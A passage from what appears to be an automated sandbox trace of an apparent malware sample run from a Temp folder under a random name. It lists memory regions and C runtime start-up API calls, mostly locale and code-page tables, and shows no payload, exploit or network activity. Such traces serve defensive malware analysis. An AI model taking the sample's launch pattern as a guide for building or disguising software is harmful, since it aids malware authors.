0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 8001 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8002 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 8003 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8004 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8005 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8006 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8007 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8008 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8009 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8010 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8011 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 8012 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8013 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8017 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8018 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 8019 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 8020 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 8021 start_va = 0x11e0000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 8265 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 8266 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 8330 start_va = 0x11e0000 end_va = 0x12befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 8331 start_va = 0x1370000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 8332 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 8333 start_va = 0x3d0000 end_va = 0x3d2fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 8334 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Thread: id = 82 os_tid = 0xe14 [0115.689] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x825266a0, dwHighDateTime=0x1d440a9)) [0115.689] GetCurrentProcessId () returned 0xe10 [0115.689] GetCurrentThreadId () returned 0xe14 [0115.689] GetTickCount () returned 0x27751 [0115.689] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=17247825433) returned 1 [0115.689] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0115.689] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0115.690] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0115.690] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0115.690] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0115.690] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0115.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0115.692] GetCurrentThreadId () returned 0xe14 [0115.692] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13707d0)) [0115.692] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0115.692] GetFileType (hFile=0x3) returned 0x0 [0115.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.692] GetFileType (hFile=0x7) returned 0x0 [0115.692] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0115.692] GetFileType (hFile=0xb) returned 0x0 [0115.692] SetHandleCount (uNumber=0x20) returned 0x20 [0115.692] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0115.692] GetEnvironmentStringsW () returned 0x15fc88* [0115.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0115.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13711f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0115.692] FreeEnvironmentStringsW (penv=0x15fc88) returned 1 [0115.692] GetLastError () returned 0x6 [0115.692] SetLastError (dwErrCode=0x6) [0115.692] GetLastError () returned 0x6 [0115.692] SetLastError (dwErrCode=0x6) [0115.692] GetLastError () returned 0x6 [0115.692] SetLastError (dwErrCode=0x6) [0115.692] GetACP () returned 0x4e4 [0115.693] GetLastError () returned 0x6 [0115.693] SetLastError (dwErrCode=0x6) [0115.693] IsValidCodePage (CodePage=0x4e4) returned 1 [0115.693] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0115.693] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0115.693] GetLastError () returned 0x6 [0115.693] SetLastError (dwErrCode=0x6) [0115.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0115.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0115.693] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0115.693] GetLastError () returned 0x6 [0115.693] SetLastError (dwErrCode=0x6) [0115.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0115.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ") returned 256 [0115.694] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0115.694] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0115.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xa9\x29\x8d\x86\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0115.694] GetLastError () returned 0x6 [0115.694] SetLastError (dwErrCode=0x6) [0115.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0115.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ") returned 256 [0115.694] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0115.694] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0115.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f